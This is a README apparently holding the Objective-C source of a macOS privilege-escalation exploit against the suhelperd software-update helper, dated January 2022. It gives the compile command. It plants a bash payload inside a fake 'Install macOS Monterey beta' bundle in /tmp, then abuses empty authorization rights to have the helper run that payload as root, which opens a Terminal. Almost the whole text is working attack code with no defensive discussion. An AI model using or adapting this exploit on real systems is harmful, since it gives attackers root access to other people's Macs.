README.md
Rendering markdown...
//
// main.m
// exploit_suhelperd
//
// Created by mickey on 2022/1/21.
//
/// clang exploit.m -o /tmp/exploit -framework Foundation -fobjc-arc -fobjc-link-runtime /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/System/Library/PrivateFrameworks/SoftwareUpdate.framework/Versions/A/SoftwareUpdate.tbd
#import <Foundation/Foundation.h>
@protocol SUHelperDProtocol
// some protocol methods
@end
@interface SUHelperProxy : NSObject <SUHelperDProtocol>
{
unsigned int _suhelperd_port;
unsigned int _client_port;
long long _currentRights;
NSObject<OS_dispatch_queue> *_q;
NSObject<OS_dispatch_source> *clientPortDeadChecker;
long long _recentRights;
}
+ (id)sharedHelperProxy;
@property long long recentRights; // @synthesize recentRights=_recentRights;
- (void)authorizeWithEmptyAuthorizationForRights:(long long)arg1;
- (BOOL) prepareInstallAssistantWithPath:(NSString *)arg1;
- (id) installAssistantPreparationStatus;
@end
int main(int argc, const char * argv[]) {
NSLog(@"preparing payload shell...");
[@"#!/bin/bash\ntouch /Library/test_root\n/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\n" writeToFile:@"/tmp/Applications/Install macOS Monterey beta.app/Contents/Frameworks/OSInstallerSetup.framework/Resources/osinstallersetupd" atomically:TRUE encoding:NSUTF8StringEncoding error:nil];
// fire the hole
NSLog(@"all ready, press enter to fire the hole.");
getchar();
SUHelperProxy *helper = [SUHelperProxy sharedHelperProxy];
[helper authorizeWithEmptyAuthorizationForRights:4];
id status = [helper installAssistantPreparationStatus];
NSLog(@"installAssistantPreparationStatus:%@", status);
// will hang inside, waiting for XPC response
[helper prepareInstallAssistantWithPath:@"/tmp/Applications/Install macOS Monterey beta.app"];
return 0;
}